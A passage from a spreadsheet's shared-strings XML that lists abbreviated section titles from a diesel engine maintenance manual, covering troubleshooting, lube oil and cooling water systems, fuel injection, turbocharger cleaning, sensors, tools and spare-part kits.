  </si>
  <si>
    <t>T. s. f. cent. by-pass f.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>T- shooting guide for a.s.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>T. s. f. c. w. system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>T. s. f. lub. oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>T. s./electrical failures</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maintenance of lub. oil cond.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crit. f. c./exc. of lub. oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricating points</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLOC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil quality</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nomog. for deter. of CCAI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fresh water system treat.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Quality of engine cooling water</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Checking cooling water</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning cooling water system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Quality of raw-water / cooltower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Quality of water / exh gasboiler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston, c. rod and c. l.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft and caMShaft drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>control and safety systeMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Com. from the GenSet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sensors used on engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting of anti-vibration</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clean. tc, dry clean. comp.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control air, charge air blow off</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Centrifugal bypass filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling w. thermo. valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intro. to spare parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for inspection of fuel valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for overhaul of fuel valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for compl. cyl.unit exchange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for overhaul of rotocap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for renewal of piston rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for high/low freshwater pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for intermediate piece</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for cover centrifugal filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for rotor centrifugal filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for cover nut centrif filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for valve centrifugal filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for seals centrifugal filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for lubricating oil filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for fuel injection pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for pressure valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit fuel inj. pump connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng. performance data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Disass. of cyl. unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ins. of inlet valves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rec. of  v. spindle seat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve rotator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Repl. of valve guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ch/adj of safety valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Repl. of v. seat ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dism. of piston and con.rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cr. for re. of con. on r.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount. of piston and con.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rem/mount. of m. head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hyd. tight. of con. r. s.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>In-situ insp. conn. rod bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection and honing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grinding of seal face</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check of cam. and cam. d.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Measure of fuel pump lead</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. of valve roller g.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inst. of bracket f. roller guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test/adj. saf. alarm/mon. equip.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj./test of on/off thermostate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Func./test level switch - LAL 25</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj./test analog press. trans.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj./test analog temp. trans.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Function test of shutdown</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj./test of tacho/prox. sensors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj./test of on/off pressostate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount./adj. of pick-up on engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. of g. bear. shells</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Func. test of crankc.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ch. air cooler housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exh. pipe compensator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel injection valve - checked</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel injection valve - separated</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Assembly of fuel injection valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dis/ass of fuel pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grind. fuel inj. valve seat face</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Removal refitting fuel inj valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel injection valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crankcase lub. oil separator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check of lub. oil piping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling water, t. valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HT and LT water pumps</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maint. of hyd. tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tigh. w. torque spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tool comb. con. rod s.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Max. pres. Indicator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve spindles and v. g.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe for ignition cable</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Diagram for overspeed stop</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Overspeed drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermo- and pressure states</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prelubricating oil alarm, LAL 25</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Level switch in oil sump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operator panel and control unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Temperature sensors (Pt100)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil leakage alarm, LAH 42</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flow and level sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Temperature sensors (NiCrNi)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotation and position sensors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil mist detector - mechanical</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Monitoring box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Terminal boxes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Converter - engine rpm signal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Converter - TC rpm signal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Speed control system - Elec.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools - Hand held programmer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Analog annumciator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prelubricating oil pump starter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main bearing monitoring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crankcase oil monitoring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas regulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CoCoS - EDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Vibration damper/Tuning wheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drive of pumps</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Front-end box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover on frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover on aft. end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aft. end box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exh. pipe arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust pipe before turbocharger</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Water w. comp.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN TRAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Condensate discharge air arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Heat insul./cover of exh. pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covering of charge air receiver</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arrangem. of exhaust gas outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Water washing of turbine side</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Autom. control, charge air temp.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charge air connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charge air pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. Oil pipes t.c.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>By-pass arr. charge air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charge air conn. to ch.air rec.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting of ch. air cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball valve ICS surplus air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Solenoid valve ICS surplus air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Low load control box for ICS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blow-back monitor for ICS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbine by-pass valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Auxiliary blower arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arrangement of safety head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exh. gas TC. outl./adm. casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotor and diffuser</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air intake casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electronic speed meas. device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning turbine, wet cleaning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning turbine, dry cleaning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning compressor, sep. tank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning compressor, syringe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covering gas outl./adm. casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>St. Piston valve/air distributor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arrangement of air starter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control system, air starter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air lubricator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air strainer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure reduction station</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Solenoid valve, 3/2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Trap strainer for pressure air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Solenoid valve, charge air temp.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Start air slipping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of jet syst.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Diagram for fuel oil system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel injection pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>High pressure fuel oil pipe arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nozz. cool. oil thermo. valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main pipe on cylinder section</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil inlet cylinder section</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Branch pipe on cylinder section</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nozzle cooling system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MDO pump unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pre regulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of pressure transmitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas pressure regulating unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stainless steel tubing for gas</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Diagram - lubricating oil system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure regulating valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insert for external filtration</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sealing oil filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of lub. oil separator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of crankcase venting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Filter for recirculation system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricating oil pipes on engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil thermostatic elements</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>High pressure sealing oil unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Diagram for cooling water system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Freshwater thermostatic valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cool. water thermostatic element</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fresh water pumps</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Butterfly valve,  ICS cool water</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pneu actuator, surplus air valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3-way ball valve, ICS cool water</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pneu actuator, 3-way valves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3-way solenoid valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cool. w.ther.for high temp. s.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cool. w.ther.for low temp. s.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting of throttle insert</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spec adapted engine comp.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sandwich mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Additional tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Special tools for low. d. h.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for engine frame/baseframe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for low overh. H.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tool panel - cylinder unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Accessories for hydraulic tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools - ring and fork spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools - socket spanner set - box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grinding machine, valve seat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for piston/conn. rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for crankshaft/m. bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for starting air system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for lubricating oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas-admission casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>List of assemblies</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas outlet diffuser</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbine nozzle ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Casing feet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insert, compressor side</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insert, turine side</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Silincer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Post lubrication tank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bursting protection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Speed measuring device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning device for turbine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning device for compressor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pressure adjusting valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coverings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>List of reserve parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cap. at MCR - MDO operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cap. at MCR - HFO operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maint. MDO, major overhaul/insp.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maint. HFO, major overhaul/insp.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maint. MDO, duties during ope.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maint. HFO, duties during ope.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng. performance and condition</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Condensate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Faults in cooling water system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Faults in lubricating oil system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crankshaft and main bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sleeve spring vibration damper</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil system - MDO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil system - HFO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel injection system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rec. of crankshaft deflection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check of cam. and cam. drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. and repl. of cam. bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dism. of cyl. unit from engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Disassembly of cylinder unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dism. of piston and cyl. liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. of inlet and exh. valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grin. of v. s. r. and v. s. seat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Replacement of valve guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rem. of m. head from eng.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. of con. rod big-end b.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. and h. of cyl. liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grinding of seal faces</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection of valve rotators</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check and overhaul of ind. v.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check of saf. v. opening pres.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning of charge air cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling water thermo. valves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj. and test of t. s. (NiCrNi)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adj. and test of t. and p. sens.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricating oil pan</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Frame with bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covers on frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covers on front end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covers on aft end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rol. g. for valves and inj. pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pist. with rings and piston pin</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charge air receiver</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charge air connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust pipe arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compressor washing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil primary pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil accessories</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling oil cooler</t>
